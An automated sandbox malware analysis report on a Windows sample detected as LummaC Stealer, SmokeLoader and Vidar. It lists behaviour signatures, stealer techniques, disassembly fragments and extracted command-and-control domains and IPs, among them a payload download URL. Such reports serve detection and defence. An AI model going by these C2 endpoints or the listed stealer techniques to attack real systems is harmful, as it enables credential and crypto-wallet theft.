Windows Analysis Report
4.exe

Overview

General Information

Sample name:	4.exe
Analysis ID:	1447651
MD5:	73ddf9a7f42e0452b6aa00f4e0a0afd5
SHA1:	79ea2d473e72751803c9650ae5c6b144a0aa4879
SHA256:	c166b490846d441400727765dd668262087642bae1bbfd7aaf7a1bed5aa35b62
Tags:	exe
Infos:

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected CryptOne packer

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected SmokeLoader

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Opens network shares

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4.exe

Avira: detected

Antivirus detection for URL or domain

Source: whispedwoodmoodsksl.shop	Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/l	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/aFX	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/B9E	Avira URL Cloud: Label: malware
Source: holicisticscrarws.shop	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\sdveeeu	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp

Found malware configuration

Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: F441.exe.3192.6.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}

Multi AV Scanner detection for domain / URL

Source: whispedwoodmoodsksl.shop	Virustotal: Detection: 17%	Perma Link
Source: dbfhns.in	Virustotal: Detection: 5%	Perma Link
Source: whispedwoodmoodsksl.shop	Virustotal: Detection: 17%	Perma Link
Source: http://guteyr.cc/tmp/index.php	Virustotal: Detection: 12%	Perma Link
Source: https://65.109.242.59/f	Virustotal: Detection: 12%	Perma Link
Source: http://45.129.96.86/file/update.exe	Virustotal: Detection: 20%	Perma Link
Source: https://65.109.242.59	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\F441.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\sdveeeu	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: 4.exe	ReversingLabs: Detection: 39%
Source: 4.exe	Virustotal: Detection: 45%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\sdveeeu	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 4.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0041537E CryptUnprotectData,	6_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFFA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	9_2_6CFFA9A0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF44C0 PK11_PubEncrypt,	9_2_6CFF44C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0425B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	9_2_6D0425B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF4440 PK11_PrivDecrypt,	9_2_6CFF4440
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFC4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	9_2_6CFC4420
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	9_2_6CFDE6E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	9_2_6D01A730
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD8670 PK11_ExportEncryptedPrivKeyInfo,	9_2_6CFD8670
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFFA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	9_2_6CFFA650
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D020180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	9_2_6D020180
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF43B0 PK11_PubEncryptPKCS1,PR_SetError,	9_2_6CFF43B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	9_2_6D01BD30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D017C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	9_2_6D017C00
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	9_2_6CFD7D60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF3FF0 PK11_PrivDecryptPKCS1,	9_2_6CFF3FF0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D019EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	9_2_6D019EC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	9_2_6CFF3850
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	9_2_6CFF9840
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01DA40 SEC_PKCS7ContentIsEncrypted,	9_2_6D01DA40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D027410 NSS_SecureMemcmp,PR_SetError,PK11_Decrypt,	9_2_6D027410

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Unpacked PE file: 6.2.F441.exe.400000.0.unpack

Uses 32bit PE files

Source: 4.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52659 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:52660 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52661 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:52662 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source:	Binary string: nss3.pdb@ source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source:	Binary string: nss3.pdb source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: mozglue.pdb source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.9.dr

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000910h]	6_2_00427353
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	6_2_00427353
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov word ptr [eax], cx	6_2_004168EF
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	6_2_00409960
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	6_2_00409960
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	6_2_00404970
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	6_2_00415FE1
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then dec edx	6_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	6_2_00417062
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	6_2_00417062
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_00426174
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+54h]	6_2_004381BB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_00426271
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_00426284
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	6_2_004102B2
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	6_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, 00008000h	6_2_00403570
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp cl, 0000002Eh	6_2_00421580
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	6_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	6_2_00414660
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edi, ebx	6_2_00436670
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	6_2_00431680
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000C0h]	6_2_004106B1
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h	6_2_004138D2
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	6_2_004248E0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	6_2_00423931
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	6_2_00423AD0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then jmp edx	6_2_00422AFB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+4Ch]	6_2_00415AFA
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	6_2_0040CB10
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	6_2_0040FBB4
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then jmp edx	6_2_0041CCD0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	6_2_00423C97
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	6_2_00433D0A
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	6_2_00438F15
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	6_2_02106248
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then dec edx	6_2_0212B2B7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	6_2_021072C9
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	6_2_021072C9
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp cl, 0000002Eh	6_2_021112E0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_021163DB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then jmp edx	6_2_0210D097
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	6_2_0212917C
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	6_2_02106739
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, 00008000h	6_2_020F37D7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_021164D8
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_021164EB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	6_2_02100519
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000910h]	6_2_021175BA
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	6_2_021175BA
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov word ptr [eax], cx	6_2_02106B56
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	6_2_02114B47
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	6_2_02113B98
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	6_2_020F9BC7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	6_2_020F9BC7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	6_2_020F4BD7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	6_2_02114B47
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	6_2_020F2807
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edi, ebx	6_2_021268D7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	6_2_021048C7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	6_2_021218E7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000C0h]	6_2_02100918
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	6_2_02123E13
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	6_2_020FFE1B
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	6_2_02113ECF
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	6_2_02113EFE
